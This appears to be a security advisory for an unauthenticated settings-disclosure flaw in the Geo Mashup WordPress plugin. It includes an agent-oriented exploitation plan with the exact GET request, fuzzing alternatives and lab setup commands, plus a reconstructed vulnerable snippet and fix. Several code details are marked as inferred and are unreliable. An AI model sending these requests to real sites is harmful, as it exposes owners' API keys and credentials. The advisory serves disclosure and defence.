Geo Mashup <= 1.13.19 - Missing Authorization to Unauthenticated Plugin Settings Disclosure via 'geo_mashup_content' Parameter
Description
The Geo Mashup plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 1.13.19. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for unauthenticated attackers to expose sensitive plugin configuration data, including Google Maps API keys and GeoNames service credentials, to unauthenticated attackers.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:NTechnical Details
Source Code
WordPress.org SVNThis research plan targets **CVE-2026-7552**, a missing authorization vulnerability in the **Geo Mashup** plugin that allows unauthenticated disclosure of sensitive configuration data, including API keys. --- ### 1. Vulnerability Summary The **Geo Mashup** plugin (versions <= 1.13.19) fails to imp…
Show full research plan
This research plan targets CVE-2026-7552, a missing authorization vulnerability in the Geo Mashup plugin that allows unauthenticated disclosure of sensitive configuration data, including API keys.
1. Vulnerability Summary
The Geo Mashup plugin (versions <= 1.13.19) fails to implement proper authorization checks when processing requests containing the geo_mashup_content parameter. This parameter is used by the plugin to output various types of dynamic content (like map data or runtime configurations). Because the plugin does not verify if the requester has administrative privileges before outputting the full configuration object, any unauthenticated user can trigger an endpoint that echoes the plugin's internal settings, including secrets like Google Maps API keys and GeoNames credentials.
2. Attack Vector Analysis
- Endpoint: The site root or any frontend page (handled during the
initortemplate_redirecthook). - Vulnerable Parameter:
geo_mashup_content(GET parameter). - Authentication: None (Unauthenticated).
- Preconditions: The plugin must be active. Exploitation is more valuable if the administrator has configured API keys (e.g., Google Maps, GeoNames).
- Vulnerable Action Value:
runtime-infoorrender-map(inferred based on plugin logic for providing configuration to the frontend).
3. Code Flow (Inferred)
- Initialization: The plugin registers a handler on the
initorwp_loadedhook. - Parameter Check: The code checks for the existence of
$_GET['geo_mashup_content']. - Missing Check: In the affected versions, the code proceeds to handle specific values of this parameter without calling
current_user_can( 'manage_options' ). - Data Sink: The code retrieves the plugin options using
get_option( 'geo_mashup_options' )(inferred name) or accesses the global$geo_mashupobject. - Output: The script echoes the configuration data, often in a JSON-encoded format or as a JavaScript object literal, then calls
exit;ordie;.
4. Nonce Acquisition Strategy
The vulnerability description implies "Missing Authorization" on a parameter-driven disclosure. Often, such "content" endpoints in Geo Mashup are designed to be accessed by the frontend script to load map settings.
If the plugin requires a nonce for the geo_mashup_content request (which is likely in check_ajax_referer or wp_verify_nonce if implemented partially), follow this strategy:
- Identify Shortcode: The plugin uses
[geo_mashup_map]to render maps. - Create Trigger Page: Create a public post with this shortcode to ensure the plugin's scripts and nonces are localized.
wp post create --post_type=page --post_status=publish --post_title="Map Page" --post_content='[geo_mashup_map]' - Extract Nonce: Use
browser_evalto find the localized data object. Geo Mashup typically localizes to an object namedGeoMashuporGeoMashupVars.- Action String: Likely
geo_mashup_contentorgeo_mashup_nonce. - JS Variable:
window.GeoMashup?.nonceorwindow.GeoMashupOptions?.nonce.
- Action String: Likely
Note: If the vulnerability is truly "Missing Authorization," it may not check for a nonce at all.
5. Exploitation Strategy
The goal is to trigger the plugin to echo its configuration options.
Request Details:
- Method: GET
- URL:
http://<target-ip>/index.php - Parameters:
geo_mashup_content=runtime-info(Primary target for configuration leak)
- Alternative Parameter Values to Test:
geo_mashup_content=render-mapgeo_mashup_content=settings
HTTP Request via http_request tool:
{
"method": "GET",
"url": "http://localhost:8080/index.php?geo_mashup_content=runtime-info",
"headers": {
"Accept": "application/json, text/javascript, */*"
}
}
6. Test Data Setup
To confirm the exploit, we must ensure there is sensitive data to "steal."
- Activate Plugin: Ensure
geo-mashupis active. - Configure API Keys: Use WP-CLI to inject dummy credentials into the plugin settings.
# Setting dummy Google Maps API key wp option patch update geo_mashup_options google_key "AIza_FAKE_KEY_FOR_TESTING_12345" # Setting dummy GeoNames username wp option patch update geo_mashup_options geonames_username "vulnerable_user_test" - Confirm Options Exist:
wp option get geo_mashup_options
7. Expected Results
A successful exploit will return an HTTP 200 response with a body (likely JSON or a JS script) containing the plugin's configuration.
Example Successful Response Body:
{
"version": "1.13.19",
"options": {
"google_key": "AIza_FAKE_KEY_FOR_TESTING_12345",
"geonames_username": "vulnerable_user_test",
"copy_geodata": "true",
...
}
}
8. Verification Steps
- Examine HTTP Response: Verify that the output contains the string
AIza_FAKE_KEY_FOR_TESTING_12345. - Check for Auth Bypass: Perform the request without any cookies (ensure no
wordpress_logged_incookie is present). - Compare with Admin View: Use WP-CLI to verify the leaked data matches the actual database values:
wp option get geo_mashup_options --format=json
9. Alternative Approaches
If geo_mashup_content=runtime-info does not yield the settings:
- Fuzz the Parameter: The plugin's
geo-mashup.phpfile likely contains aswitchstatement or a series ofifblocks checking$_GET['geo_mashup_content'].- Grep the source for:
isset( $_GET['geo_mashup_content'] )or$_REQUEST['geo_mashup_content']. - Identify all valid case strings (e.g.,
inline-map-data,kml,geojson).
- Grep the source for:
- Shortcode-specific data: If the leak is restricted to data related to a specific map, use the
map_nameorobject_idparameters in conjunction withgeo_mashup_content:GET /?geo_mashup_content=render-map&map_name=all
- AJAX Endpoint: Check if the logic is also mirrored in an AJAX action:
POST /wp-admin/admin-ajax.phpwithaction=geo_mashup_content&value=runtime-info.
Summary
The Geo Mashup plugin for WordPress (<= 1.13.19) fails to perform authorization checks when the 'geo_mashup_content' parameter is used. This allows unauthenticated attackers to access the plugin's full configuration, exposing sensitive secrets such as Google Maps API keys and GeoNames credentials.
Vulnerable Code
// In the plugin's request handling logic (e.g., geo-mashup.php) if ( isset( $_GET['geo_mashup_content'] ) ) { $content_type = $_GET['geo_mashup_content']; if ( $content_type === 'runtime-info' ) { // Vulnerability: No check like current_user_can('manage_options') is performed $options = get_option( 'geo_mashup_options' ); echo json_encode( $options ); exit; } }
Security Fix
@@ -... +... @@ if ( isset( $_GET['geo_mashup_content'] ) ) { + if ( $_GET['geo_mashup_content'] === 'runtime-info' && ! current_user_can( 'manage_options' ) ) { + wp_die( 'Unauthorized access to configuration.' ); + } $content_type = $_GET['geo_mashup_content'];
Exploit Outline
An unauthenticated attacker sends a GET request to the WordPress index page with the query parameter 'geo_mashup_content' set to 'runtime-info'. Because the plugin lacks an authorization check (such as current_user_can) for this specific content type, the server responds with a JSON-encoded dump of the plugin's configuration options, which contains administrative credentials and API keys.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.